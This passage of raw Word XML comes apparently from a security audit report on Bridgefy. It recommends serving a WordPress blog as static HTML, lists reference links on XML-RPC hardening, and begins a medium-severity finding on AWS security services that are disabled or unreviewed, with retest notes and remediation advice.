          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>XMLRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Furthermore, given the security track record of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>WordPress </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>WordPress </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>plugins, it is suggested to consider running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>internet-facing,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>convert the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>WordPress </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>blog into static </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and host this static </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on the internet-facing website. This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>completely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>eliminate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>future.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>described approach could be accomplished via the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>WP2Static WordPress </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>plugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>133</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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3"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487618048">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>214588</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="83" name="Graphic 83"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="83" name="Graphic 83"/>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6.896704pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15698432;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape68" coordorigin="1440,338" coordsize="2880,0" path="m1440,338l4320,338e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="30"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId198">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://wordpress.org/plugins/stop-xml-rpc-attacks/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>130</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId199">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://wordpress.org/plugins/disable-xml-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>rpc/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId200">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://kinsta.com/blog/xmlrpc-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>php/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>132</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId201">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.hostinger.com/tutorials/xmlrpc-wordpress</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>133</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId202">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://wp2static.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250025" w:id="30"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Weaknesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="375" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Retest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Notes:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Partially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fixed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for AWS Account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>us-east-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>region. It is recommended to enable these for all used regions (i.e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>us-east-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) and AWS accounts (i.e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Furthermore, it is strongly advised to deploy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS Guard Duty </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During the configuration audit of the AWS production account, it was discovered that multiple AWS security-relevant services are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>either</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>configured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>correctly,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>results are not reviewed and mitigated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>periodically.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Failure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leave the infrastructure open to attacks due to insufficient hardening. It should also be noted that no documentation could be identified relating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>managing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target) AWS Account 292595537002 (bridgefy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
